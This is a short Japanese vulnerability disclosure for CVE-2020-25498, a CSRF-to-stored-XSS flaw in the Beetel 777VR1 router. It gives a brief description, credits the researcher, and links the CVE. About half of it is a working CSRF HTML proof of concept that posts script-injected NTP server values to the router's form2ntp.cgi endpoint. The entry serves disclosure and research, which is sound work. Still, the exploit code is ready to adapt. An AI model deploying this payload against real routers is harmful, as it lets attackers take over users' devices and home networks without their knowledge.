
Beetel 777VR1 RouterにおけるCSRFを介した格納型XSS
脆弱性のあるエンドポイントにはサーバーサイドの入力検証がなく、悪意のあるスクリプトインジェクションに対するクライアントサイドのフィルタリングも欠如していることが確認されています。攻撃者はこの脆弱性を利用して、エンドポイントに悪意のあるスクリプトを注入でき、そのスクリプトはユーザーが脆弱性のあるエンドポイントを開くたびに実行されます。攻撃者は POST リクエストペイロードを含む悪意のある URL を送信し、CSRF を介して管理モジュールで XSS を実行することで、デバイスを乗っ取り、最終的にはネットワークを乗っ取ることができます。
研究者: Sayli Ambure (https://twitter.com/sayli_ambure)
MITRE CVE リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498
CSRF HTML コード:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/form2ntp.cgi" method="POST">
<input type="hidden" name="ntpstate" value="Enable" />
<input type="hidden" name="ntpserver" value='google.com"><script>alert(1)</script>' />
<input type="hidden" name="ntpserver2" value='google.com"><script>alert(2)</script>' />
<input type="hidden" name="ntpinterval" value="1" />
<input type="hidden" name="ntptimezone" value="330" />
<input type="hidden" name="submit.htm?time.htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
パラメーター: サーバー名
パラメーター: キーワード